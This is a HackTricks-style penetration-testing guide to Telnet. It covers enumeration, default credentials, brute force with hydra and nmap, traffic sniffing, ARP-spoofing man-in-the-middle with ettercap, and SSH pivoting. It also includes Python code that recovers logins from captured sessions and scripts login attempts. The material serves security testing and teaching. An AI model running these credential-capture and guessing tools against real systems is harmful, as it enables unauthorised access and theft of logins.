hacktricks/network-services-pentesting/pentesting-telnet.md

# 23 - Pentesting Telnet

<details>

<summary><strong>Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) **and** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos.**

</details>

<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>

**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

{% embed url="https://pentest-tools.com/" %}

## **Basic Information**

Telnet is a network protocol that gives users an unsecured way to access a computer over a network: the login and everything typed after it cross the wire in cleartext, and the AUTHENTICATION and ENCRYPT options that could change that are almost never deployed.

**Default port:** 23

```
23/tcp open telnet
```

## **Enumeration**

### **Banner Grabbing**

Connect to port 23 and read what the service sends before the login prompt. Many telnetd builds and most network devices announce the OS or firmware version there, which is the version and platform information the rest of the test builds on:

```bash
telnet <target_ip> 23
```

### **Unauthenticated Access**

Check what the service hands out without credentials. Some embedded devices and appliances drop straight into a shell or a management menu; others print a MOTD or a `login:` prompt that already names the host and OS. Connect, press Enter a couple of times and note everything you get.

### **Username Enumeration**

Telnet has no user-listing function, so this is behavioural: compare the prompt text, error messages and response time for a username that certainly exists (`root` on most Unix systems) with those for one that certainly does not. If the server treats them differently, candidate usernames can be validated one at a time before any password guessing.

### **Default Credentials**

Try the defaults for the device type before anything noisier: `admin/admin`, `root/root`, `admin/<blank>` and the vendor-specific pairs listed on the brute-force page linked further down. On appliances and network gear this succeeds far more often than a wordlist does.

### **Brute-Force and Dictionary Attacks**

Failing that, guess username/password pairs, either every combination of a user list and a password list (brute force) or a curated list of likely pairs (dictionary). Telnet logins are slow and many devices lock out or throttle after a few failures, so keep the lists short and ordered by likelihood. `hydra`, nmap's `telnet-brute` and Metasploit all speak the protocol; see the brute-force section below.

### **Sniffing**

Telnet carries everything, including the login, in cleartext. From any position that sees the traffic (shared segment, mirror/SPAN port, a compromised host on the path) the credentials can be read straight out of the capture; `-A` prints the payload as ASCII so the typed login shows up inline:

```bash
tcpdump -i <interface> -A port 23
```
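What such a capture contains, as an added example that is not part of the original page: a Python function that replays the client/server byte stream of a Telnet login and recovers the username, the password and the commands typed. The stream below is constructed to look like Wireshark's "Follow TCP Stream" of a character-at-a-time session (the server echoes the username keystroke by keystroke but not the password, and the user corrects a typo with DEL); the prompt strings it matches are assumptions for illustration.

```python
"""Added example (not HackTricks' code): pull the login out of a captured
Telnet stream. Input is a list of (direction, payload) in wire order, as
exported from Wireshark's Follow TCP Stream: "c" = client->server, "s" = server->client."""
import re

# Constructed sample session (not a real capture). 0x18/0x20/0x23/0x27 are
# TERMINAL-TYPE, TERMINAL-SPEED, X-DISPLAY-LOCATION and NEW-ENVIRON.
SAMPLE_STREAM = [
    ("s", b"\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23\xff\xfd\x27"),      # server: DO ...
    ("c", b"\xff\xfc\x18\xff\xfc\x20\xff\xfc\x23\xff\xfc\x27"),      # client: WONT ...
    ("s", b"\xff\xfb\x01\xff\xfb\x03Ubuntu 22.04 LTS\r\nrouter login: "),
    ("c", b"a"), ("s", b"a"), ("c", b"d"), ("s", b"d"), ("c", b"m"), ("s", b"m"),
    ("c", b"i"), ("s", b"i"), ("c", b"n"), ("s", b"n"), ("c", b"\r\n"),
    ("s", b"\r\nPassword: "),                                         # no echo from here
    ("c", b"S"), ("c", b"3"), ("c", b"c"), ("c", b"r"), ("c", b"3"), ("c", b"t"),
    ("c", b"\x7f"), ("c", b"t"), ("c", b"!"), ("c", b"\r\n"),         # DEL fixes a typo
    ("s", b"\r\nLast login: Mon Jan  1 00:00:00\r\nadmin@router:~$ "),
    ("c", b"id\r\n"), ("s", b"id\r\nuid=1000(admin) gid=1000(admin)\r\nadmin@router:~$ "),
]


def strip_telnet_iac(data):
    """Remove RFC 854 negotiation, leaving only application bytes."""
    data = re.sub(rb"\xff\xfa.*?\xff\xf0", b"", data, flags=re.S)  # IAC SB ... IAC SE
    data = re.sub(rb"\xff[\xfb-\xfe].", b"", data, flags=re.S)     # IAC DO/DONT/WILL/WONT <opt>
    data = re.sub(rb"\xff[\xf0-\xf9]", b"", data)                  # other two-byte commands
    return data.replace(b"\xff\xff", b"\xff")                      # escaped literal 0xFF


def extract_credentials(stream):
    """Replay the stream; classify each line the client finished with CR by
    the server text that preceded it (login prompt, password prompt, shell)."""
    found = {"username": None, "password": None, "commands": []}
    prompt, line = b"", bytearray()      # server output since last line / current keystrokes
    for direction, payload in stream:
        payload = strip_telnet_iac(payload)
        if direction == "s":
            prompt += payload
            continue
        for b in payload:
            if b in (0x08, 0x7f):        # BS/DEL: the user corrected a typo
                if line:
                    line.pop()
            elif b == 0x0d:              # CR finishes the line
                typed = bytes(line)
                # Drop the server's echo of the typed text so the prompt is visible again.
                p = prompt[:-len(typed)] if typed and prompt.endswith(typed) else prompt
                p = p.rstrip().lower()
                text = typed.decode("utf-8", "replace")
                if p.endswith((b"login:", b"username:", b"user:")):
                    found["username"] = text
                elif p.endswith(b"password:"):
                    found["password"] = text
                else:
                    found["commands"].append(text)
                prompt, line = b"", bytearray()
            elif b not in (0x0a, 0x00):  # LF or NUL after CR carries nothing
                line.append(b)
    return found
```

`extract_credentials(SAMPLE_STREAM)` returns `admin` / `S3cr3t!` and the command `id`. Feeding a real capture means splitting the stream by direction first (Wireshark's stream export or `tshark -z follow,tcp,raw,<stream>`); the echo handling is what makes character-at-a-time sessions readable, since a plain dump shows every username letter twice.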
### **Man-in-the-Middle Attack**

On a switched LAN, ARP-spoof the target and its gateway so the Telnet session passes through your host; you can then read the login or inject commands into the already authenticated session. With `ettercap`:

```bash
ettercap -T -q -M arp:remote /<gateway_ip>/ /<target_ip>/
```

The target syntax is `MAC/IP/PORT` on older builds and `MAC/IP/IPv6/PORT` on builds with IPv6 support (so `/<target_ip>//`); check `man ettercap` for your version. ARP spoofing is loud and can knock the target offline if the intercepted packets are not forwarded; ettercap forwards them itself (unlike `arpspoof`, which needs kernel IP forwarding enabled), and it still needs to be allowed by the engagement rules.

The same banner grab with netcat, which performs no option negotiation, so the IAC bytes the server sends first show up as garbage in front of the banner:
```bash
nc -vn <IP> 23
```
All the interesting enumeration can be performed with **nmap**:
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
The script `telnet-ntlm-info.nse` will obtain NTLM info (Windows versions).

From the [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): in the TELNET Protocol there are various "**options**" that will be sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc.

**I know that it is possible to enumerate these options but I don't know how, so let me know if you know how.**
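One way to do it, as an added example that is not part of the HackTricks page: a small Python client (standard library only) that connects, refuses every option the server proposes and records the DO/WILL/SB sequence it saw before the login prompt. The same parser drives a prompt-aware scripted login, which is the reliable replacement for piping credentials into `telnet` in the default-credentials and brute-force sections above. Host, port, the prompt strings and the success heuristic are assumptions for illustration; Python's own `telnetlib` did the same negotiation but was removed in Python 3.13, hence the hand-rolled parser.

```python
"""Added example (not HackTricks' code): enumerate Telnet option negotiation
(RFC 854/855) and drive a prompt-aware scripted login. Standard library only."""
import socket

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
VERBS = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}
# Option codes from the IANA Telnet options registry (the ones seen most often).
OPTIONS = {0: "BINARY", 1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 5: "STATUS", 24: "TERMINAL-TYPE",
           31: "NAWS", 32: "TERMINAL-SPEED", 33: "REMOTE-FLOW-CONTROL", 34: "LINEMODE",
           35: "X-DISPLAY-LOCATION", 36: "ENVIRON", 37: "AUTHENTICATION", 38: "ENCRYPT",
           39: "NEW-ENVIRON"}
# Assumed prompt strings; adjust to the target's login banner.
LOGIN_PROMPTS = (b"login:", b"Login:", b"Username:", b"username:")


def option_name(opt):
    return OPTIONS.get(opt, "OPT-%d" % opt)


def parse_negotiation(data):
    """Split raw Telnet bytes into (app_bytes, events, reply, rest).
    events: ("DO"|"DONT"|"WILL"|"WONT"|"SB", option) in wire order.
    reply:  refuses everything (DO -> WONT, WILL -> DONT); plain NVT mode
            still reaches the login prompt on any compliant server.
    rest:   a negotiation cut off by the chunk boundary; prepend it to the
            next recv() so nothing is lost between packets."""
    app, events, reply = bytearray(), [], bytearray()
    i, n = 0, len(data)
    while i < n:
        if data[i] != IAC:
            app.append(data[i]); i += 1; continue
        if i + 1 >= n:
            break                                # lone IAC: need more bytes
        cmd = data[i + 1]
        if cmd == IAC:                           # IAC IAC = literal 0xFF
            app.append(IAC); i += 2
        elif cmd in VERBS:
            if i + 2 >= n:
                break                            # option byte not here yet
            opt = data[i + 2]
            events.append((VERBS[cmd], opt))
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3
        elif cmd == SB:                          # IAC SB <opt> ... IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            if end == -1:
                break
            events.append(("SB", data[i + 2]))
            i = end + 2
        else:                                    # NOP, GA, AYT, ...: no option byte
            i += 2
    return bytes(app), events, bytes(reply), data[i:]


class TelnetSession:
    def __init__(self, host, port=23, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.pending = b""   # partial negotiation carried between recv() calls
        self.events = []     # every (verb, option) the server sent

    def read_until(self, *markers, timeout=5.0):
        """Application data up to the first marker (or timeout/EOF)."""
        self.sock.settimeout(timeout)
        out = b""
        while not any(m in out for m in markers):
            try:
                chunk = self.sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            app, events, reply, self.pending = parse_negotiation(self.pending + chunk)
            self.events += events
            if reply:
                self.sock.sendall(reply)
            out += app
        return out

    def send_line(self, text):
        # NVT end-of-line is CR LF; a literal 0xFF in data must be doubled.
        self.sock.sendall(text.encode().replace(b"\xff", b"\xff\xff") + b"\r\n")


def probe_options(host, port=23):
    """Connect, refuse every option, report what the server tried to negotiate."""
    s = TelnetSession(host, port)
    banner = s.read_until(*LOGIN_PROMPTS, b"Password:")
    s.sock.close()
    return [(verb, option_name(opt)) for verb, opt in s.events], banner


def try_login(host, user, password, port=23):
    """Prompt-aware login; True unless the server visibly rejected the pair."""
    s = TelnetSession(host, port)
    s.read_until(*LOGIN_PROMPTS)
    s.send_line(user)
    s.read_until(b"assword:")
    s.send_line(password)
    after = s.read_until(b"$ ", b"# ", b"> ", b"incorrect", b"failed", *LOGIN_PROMPTS, timeout=3)
    s.sock.close()
    return not any(k in after.lower() for k in (b"incorrect", b"failed", b"denied", b"login:", b"username:"))
```

`probe_options("<target_ip>")` returns something like `[("DO", "TERMINAL-TYPE"), ("WILL", "ECHO"), ...]` plus the banner; a server that offers `WILL ENCRYPT` or `DO AUTHENTICATION` is the case the `telnet_encrypt_overflow` Metasploit module listed further down and nmap's `telnet-encryption` script are interested in. `try_login("<target_ip>", "admin", "admin")` is what a default-credential loop should call instead of `echo -e "user\npass" | telnet`, because it waits for each prompt before answering it.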
### [Brute force](../generic-methodologies-and-resources/brute-force.md#telnet)

## Config files
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```
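What those files look like, as an added illustration that is not from the page (the `service telnet` stanza is the stock xinetd shape; the `server_args` and `only_from` lines are added to show the hardening knobs and are assumptions about a given host). After a compromise they tell you whether Telnet is on by design (`disable = no`) and whether access is restricted at all:

```conf
# /etc/xinetd.d/telnet (xinetd): the service listens as long as "disable = no"
service telnet
{
    disable         = no
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    server          = /usr/sbin/in.telnetd
    server_args     = -h            # assumed: telnetd -h suppresses the pre-login host banner
    only_from       = 10.0.0.0/8    # assumed restriction; absent in the stock file
    log_on_failure  += USERID
}

# /etc/inetd.conf (classic inetd): one line per service; commenting it out disables Telnet
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
```

A missing `only_from` (or an `in.telnetd` line without `tcpd`/hosts.allow in front of it) means anyone who can reach port 23 gets the login prompt, which is the situation the enumeration above assumes.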

## HackTricks Automatic Commands

Hands-on commands for a Telnet engagement: grabbing the banner, scripting a login, guessing credentials and fingerprinting the service, plus the SSH forwards typically used to reach a Telnet port that is only exposed internally.

### Banner Grabbing
#### Command: `nc -vn <target_ip> <port>`
Connects without negotiating any options and prints whatever the service sends first (the raw IAC bytes show up as garbage ahead of the banner). `echo "" | telnet <target_ip> <port>` also works for a quick look, but `telnet` exits as soon as stdin reaches EOF, so a banner that arrives late is lost.

### Scripted Login and Command Execution
#### Command: `(sleep 1; echo "<username>"; sleep 1; echo "<password>"; sleep 1; echo "<command>"; sleep 2) | telnet <target_ip> <port>`
This is not an authentication bypass: it feeds credentials you already have and runs one command with them. The `sleep`s matter, because `telnet` writes stdin to the socket as soon as it is available, so a plain `echo -e "user\npass" | telnet` fires before the `login:`/`Password:` prompts exist; `telnet` also closes on EOF, so the final `sleep` gives the command time to return its output. For anything beyond a one-off, use a prompt-aware client (`expect`, a small socket script) or let `hydra`/Metasploit do the guessing.

### File Transfer
Telnet has no transfer mechanism of its own, and `sz <file> | telnet ...` does not work: `sz`/`rz` (ZMODEM) run inside an interactive session with a ZMODEM-capable terminal on the other end. Over a Telnet shell the options are a ZMODEM terminal (run `rz` on the target, then send from the terminal), pasting small files as `base64`/`echo -e` payloads, or having the target fetch the file over another service it can reach.

### Pivoting with SSH
These are not Telnet commands, but a Telnet service is often only reachable on an internal segment and an SSH host on the path is the usual way in:
#### Command: `ssh -L <local_port>:<target_ip>:<target_port> <ssh_server>`
Local forward: `telnet 127.0.0.1 <local_port>` on your machine reaches `<target_ip>:<target_port>` through `<ssh_server>`.
#### Command: `ssh -R <remote_port>:<target_ip>:<target_port> <ssh_server>`
Reverse forward: `<ssh_server>` gets a listener on `<remote_port>` whose connections reach `<target_ip>:<target_port>` through your side.
#### Command: `ssh -D <local_port> <ssh_server>`
SOCKS proxy on `<local_port>`; point `proxychains` or the tool's own proxy setting at it.
Add `-N -f -l <username>` to skip the remote shell, background the session and set the login name; `-i <private_key>` authenticates with a key when password login is disabled (otherwise `ssh <username>@<target_ip>` simply prompts for the password); `-X` adds X11 forwarding if you need a graphical tool from the remote side.

### Telnet Connection
#### Command: `telnet <target_ip> <port>`
Interactive session. `Ctrl+]` escapes to the `telnet>` prompt, where `quit` drops the connection even when the remote side has stopped responding.

### Brute Force
#### Command: `nmap -p <port> --script telnet-brute <target_ip>`
#### Command: `hydra -L <user_list> -P <password_list> telnet://<target_ip>`
Both guess username/password pairs and report the ones that log in; neither enumerates users on its own, and `telnet-brute` does not scan ports. Telnet logins are slow and network gear often locks out after a few failures, so keep wordlists targeted (vendor defaults first) and the parallelism low (`-t 4` in hydra).

### Service Enumeration
#### Command: `nmap -p <port> --script telnet-ntlm-info <target_ip>`
Against Microsoft's Telnet Server this starts NTLM authentication and reads the challenge, which leaks the NetBIOS and DNS computer/domain names and the OS version without any credentials.
#### Command: `nmap -sV -p <port> <target_ip>`
Version detection: `-sV` matches the banner and negotiation behaviour against nmap's service probes. There is no `telnet-version` NSE script; Metasploit's `auxiliary/scanner/telnet/telnet_version` does the same job from the other toolkit.
```
Protocol_Name: Telnet #Protocol Abbreviation if there is one.
Port_Number: 23 #Comma separated if there is more than one.
Protocol_Description: Telnet #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for Telnet
  Note: |
    wireshark to see creds being passed
    tcp.port == 23 and ip.addr != myip

    https://book.hacktricks.xyz/pentesting/pentesting-telnet

Entry_2:
  Name: Banner Grab
  Description: Grab Telnet Banner
  Command: nc -vn {IP} 23

Entry_3:
  Name: Nmap with scripts
  Description: Run nmap scripts for telnet
  Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
  Name: consoleless msf enumeration
  Description: Telnet enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```